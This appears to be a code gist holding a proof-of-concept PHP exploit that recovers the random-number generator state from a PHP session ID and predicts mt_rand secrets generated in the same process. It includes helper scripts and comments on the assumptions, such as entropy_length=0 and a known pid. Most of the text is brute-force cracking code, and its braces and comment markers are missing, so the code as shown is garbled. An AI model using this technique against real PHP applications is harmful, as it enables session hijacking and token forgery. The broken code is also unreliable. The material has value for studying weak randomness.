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Created December 1, 2012 16:42
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SessionId and randomness in PHP
* Starts a PHP session and dump a random number
// do some stuff...
$password = mt_rand();
$otherRandomToken = rand();
$nettePass = Nette\Utils\Strings::random();
// Question 1: which of these is/are random?
// Question 2: which of these is/are unpredictable by an attacker?
// Answer 1: all three
// Answer 2: none, all can be recovered only from sessionId, precisely (i.e. attacker won't even have to try several possibilities)
* Guess parameters used for php session id
* 1. send a request which starts new session, measure timing
* 2. recover rand environment
* 3. guess random number generated
* Assumptions:
* - precisely synced clock with server
* - requests served by the same php process, which is also freshly spawned
* - we know pid of the php (not necessary, but reduces entropy by 15bits)
* - session.entropy_length=0 - default on PHP 5.3
* To try:
* php -dsession.entropy_length=0 -S
* NOTE this exploit uses slightly modified PHP, so that I don't need to re-implement several internal functions.
* PHP modification adds function my_lcg_seed(...), which modifies internal PHP variables ;)
$baseUrl = 'http://localhost:8080/helpers/';
$url = $baseUrl . 'sess.php';
$remoteAddr = '';
// 1. send a request which starts new session, measure timing
$time_r1a = microtime(true);
$fp = fopen($url, 'r');
$time_r1b = microtime(true);
$time_d1 = $time_r1b - $time_r1a;
// parse cookies
$cookies = array();
$meta = stream_get_meta_data($fp);
foreach($meta['wrapper_data'] as $header) {
if (preg_match('/Set-Cookie: ([^=]+)=([^;]+)/', $header, $match)) $cookies[$match[1]] = $match[2];
$sessionId = $cookies['PHPSESSID'];
$data1 = stream_get_contents($fp);
$randomToken = trim($data1);
printf("timing 1:\t%.6f - %.6f (duration %d us)\n", $time_r1a, $time_r1b, $time_d1 * 1e6);
echo "sessionId:\t$sessionId\n";
echo "secret random:\t$randomToken (suppose I dont know it)\n";
// 2. recover rand environment
// simplification: if you know the pid, e.g. from apache's server-status page
$pid_ = file_get_contents($baseUrl . 'pid.php'); // fake it
$pid = $pid_ ? intval($pid_) : range(1024, 32767);
$time = range($time_r1a /*+ $time_d1 / 4*/, $time_r1b /*- $time_d1 / 4*/, 1e-6); // TODO: rather a generator
$delay1 = range(0, 5); // delay between first microtime (in php_session_create_id) and lcg_seed
$delay2 = range(0, 20); // delay in lcg_seed
// options needs to be tested
$p1 = count((array) $pid);
$p2 = count((array) $time);
$p3 = count((array) $delay1);
$p4 = count((array) $delay2);
$numPossibilities = $p1 * $p2 * $p3 * $p4;
echo "cracking $numPossibilities possibilities ($p1 * $p2 * $p3 * $p4) for $sessionId\n";
// start cracking
$numFound = $numTried = 0;
$searchStart = microtime(true);
foreach ((array) $pid as $pid_) {
foreach ((array) $time as $microtime0_) {
foreach ((array) $delay1 as $delay1_) {
foreach ((array) $delay2 as $delay2_) {
$s = my_php_session_create_id($remoteAddr, $pid_, $microtime0_, $delay1_, $delay2_);
if ($s === $sessionId) {
echo "Found $s: pid=$pid_, microtime0=$microtime0_, delay1=$delay1_, delay2=$delay2_, buf=$sess_buf\n";
break 4;
$searchEnd = microtime(true);
if ($numFound) {
echo "found: after $numTried/$numPossibilities tries\ntime taken: ", $searchEnd - $searchStart, "\n";
} else {
echo "not found\n";
// 3. guess random number generated by mt_rand
my_lcg_seed(floor($microtime0_), $pid, ($microtime0_ * 1e6 % 1e6) + $delay1_, $delay2_);
lcg_value(); // called within session
lcg_value(); // FIXME: dunno where is this called!
$seed = (floor($microtime0_) * $pid_) ^ (1e6 * lcg_value());
echo "mt_rand seed:\t$seed\n";
$rand = mt_rand();
echo "secret found:\t$rand\n";
echo ($rand == $randomToken) ? "OK, I got the secret!" : "Failed, the secret doesnt match :(", "\n";
* Deterministic session id generator
function my_php_session_create_id($remote_addr, $pid, $microtime0, $d1, $d2) {
$t = (int) $microtime0;
$u = $microtime0 * 1e6 % 1e6; // us
my_lcg_seed($t, $pid, $u + $d1, $d2);
$lcg = lcg_value(true);
$GLOBALS['sess_buf'] = $buf = sprintf("%.15s%ld%ld%0.8F", $remote_addr, $t, $u, $lcg * 10);
// echo $buf, "\t", md5_sess($buf), "\n";
return md5_sess($buf);
* Emulate md5 hash which is in session
* FIXME: works only for 4bits per char (session.hash_bits_per_character)
* @param $s
* @return string
function md5_sess($s) {
return preg_replace('/(.)(.)/', '$2$1', md5($s));
* Helper to speed up the test
* (but pid can be recovered easily by other means)
echo posix_getpid();
* Starts a PHP session and dump a random number
echo mt_rand(); // this would be saved somewhere on server side; for simplicity, provide it to the user, so he can check if he was successful
* Helper to speed up the test
* (but pid can be recovered easily by other means)
echo posix_getpid();
* Starts a PHP session and dump a random number
echo mt_rand(); // this would be saved somewhere on server side; for simplicity, provide it to the user, so he can check if he was successful
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